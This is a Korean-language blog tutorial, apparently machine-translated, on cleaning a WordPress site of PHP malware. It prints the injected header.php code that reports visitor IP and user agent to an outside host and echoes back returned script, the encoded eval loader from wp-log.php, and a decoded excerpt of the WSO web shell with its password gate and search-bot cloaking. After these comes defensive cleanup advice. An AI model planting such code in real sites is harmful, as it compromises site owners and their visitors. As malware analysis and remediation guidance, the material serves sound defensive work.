제거 WordPress PHP 바이러스

Update
0

이 튜토리얼은 블로그가 WordPress 감염되었습니다. 제거 WordPress PHP 바이러스.

일전에 PHP 바이러스로 보이는 의심스러운 코드를 발견했습니다. WordPress. 다음 PHP 코드는 header.php, 줄 앞에 </head>.

<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>

이것은 외부 서버에서 리소스의 콘텐츠를 검색하려는 것처럼 보이지만 URL을 참조하는 부분이 불완전한 PHP 코드입니다.

작업 메커니즘은 다소 복잡하며 다음을 수행합니다. WordPress 영향을 받는 사이트의 방문자에게 보이지 않는 PHP 바이러스. 대신 검색 엔진(Google)을 대상으로 하며 암시적으로 영향을 받는 웹 사이트 방문자 수를 크게 줄입니다.

악성코드 세부정보 WordPress PHP 바이러스

1. 위의 코드는 header.php.

2. 서버에 나타난 파일 wp-log.php 폴더에서 wp-includes.

3. wp-log.php 암호화된 코드를 포함하지만 상대적으로 해독하기 쉽습니다.

<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>

에서 멀웨어 코드 해독 wp-log.php :

<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("
<pre align=center-->

<form method="post"><input name="pass" type="password" /><input type="submit" value="" /></form>" );
}

function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}

if(!empty($auth_pass)) {
if(isset($_POST['pass']) &amp;&amp; (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>

이것은 서버의 파일 및 디렉터리에 대한 인증 및 작업을 처리하는 코드가 포함된 악성 PHP 스크립트로 보입니다. 이 스크립트에는 다음과 같은 변수가 포함되어 있음을 매우 쉽게 알 수 있습니다. $auth_pass (인증 비밀번호), $default_action (기본 동작), $default_use_ajax (기본적으로 Ajax 사용) 및 $default_charset (기본 문자 설정).

분명히 이 스크립트에는 검색 엔진과 같은 특정 웹 봇에 대한 액세스를 차단하기 위해 HTTP 사용자 에이전트를 확인하는 섹션이 있습니다. 또한 PHP 보안 모드를 확인하고 특정 작업 디렉토리를 설정하는 섹션이 있습니다.

4. 브라우저에서 wp-log.php에 접속하면 다음과 같은 필드가 있는 웹 페이지가 나타납니다. 로그인. 언뜻 보기에 새 파일을 대상 서버에 쉽게 업로드할 수 있는 파일 관리자처럼 보입니다.

웹사이트를 바이러스 제거하는 방법 WordPress?

항상 수동 바이러스 제거 프로세스에는 취약점이 무엇인지 먼저 발견하고 이해하는 작업이 포함됩니다.

1. 전체 웹사이트에 대한 백업을 생성합니다. 여기에는 파일과 데이터베이스가 모두 포함되어야 합니다.

2. 바이러스가 존재한 대략적인 기간을 파악하고 대략적인 기간 내에 웹 서버에서 수정되거나 새로 생성된 파일을 검색합니다.

예를 들어 파일을 보고 싶다면 .php 지난 주에 생성되거나 수정된 ​​경우 서버에서 다음 명령을 실행합니다. 

find /your/web/path -type f -mtime -7 -exec ls -l {} \; | grep "\.php$"

파일을 발견할 수 있는 간단한 방법입니다. WordPress 감염되고 맬웨어 코드가 포함된 것.

3. 파일 확인 .htaccess 의심스러운 지시. 권한 줄 또는 스크립트 실행.

4. 데이터베이스를 확인하십시오. 일부 게시물과 페이지가 WordPress 맬웨어로 편집되거나 새로운 맬웨어가 추가됨 역할을 가진 사용자 administrator.

5. 폴더 및 파일에 대한 쓰기 권한을 확인합니다. chmodchown.

권장 권한은 파일의 경우 644, 디렉토리의 경우 755입니다.

find /web/root/public/ -type f -exec chmod 644 {} \;
find /web/root/public/ -type d -exec chmod 755 {} \;

6. 모두 업데이트 WordPress Plugins / WordPress Themes.

관련 : Fix Redirect WordPress Hack 2023 (리디렉트 바이러스)

다음은 웹사이트/블로그의 바이러스를 제거할 수 있는 "기본" 방법입니다. WordPress. 문제가 있거나 도움이 필요하면 댓글 섹션이 열려 있습니다.

기술에 대한 열정, 나는 기쁨으로 글을 씁니다. StealthSettings2006년부터 .com을 운영하고 있습니다. 저는 운영 체제 분야에서 폭넓은 경험을 갖고 있습니다. macOS, Windows 과 Linux, 프로그래밍 언어 및 블로그 플랫폼(WordPress) 및 온라인 상점의 경우(WooCommerce, 마젠토, 프레스타샵).

내가 작성한 튜토리얼.
안티 바이러스 및 보안 튜토리얼 및 IT 뉴스 WordPress
제거 WordPress Malware 제거 WordPress 바이러스 WordPress WordPress htaccess 바이러스 WordPress 바이러스 플러그인 WordPress 바이러스 WordPress 바이러스 테마
방법 » WordPress » 제거 WordPress PHP 바이러스

삭제 또는 제거 ModSecurity를 ​​(mod_security와)

Opera 12.02 다운로드-보안 및 성능

코멘트 남김

Stealth Settings

Windows

Windows 11

Windows 10

Windows 8 / 8.1

Windows 7

Windows Vista

Windows XP

Task Manager

How To

Microsoft 365 / Office

Microsoft 365 / Office

뛰어나다

Word

PowerPoint

Outlook

Office 365 생산성

Linux & Web Software

NGINX

Apache HTTP Server

PHP

SQL/MySQL

CentOS

Ubuntu

Web Hosting

WordPress & WooCommerce

Security & Antivirus

Awareness

Antivirus & Security

Malware

Spyware

© 2024 Stealth Settings. IT 튜토리얼 및 뉴스.

기밀 유지의 정치 | 쿠키에 대하여 | Contact | 회사 소개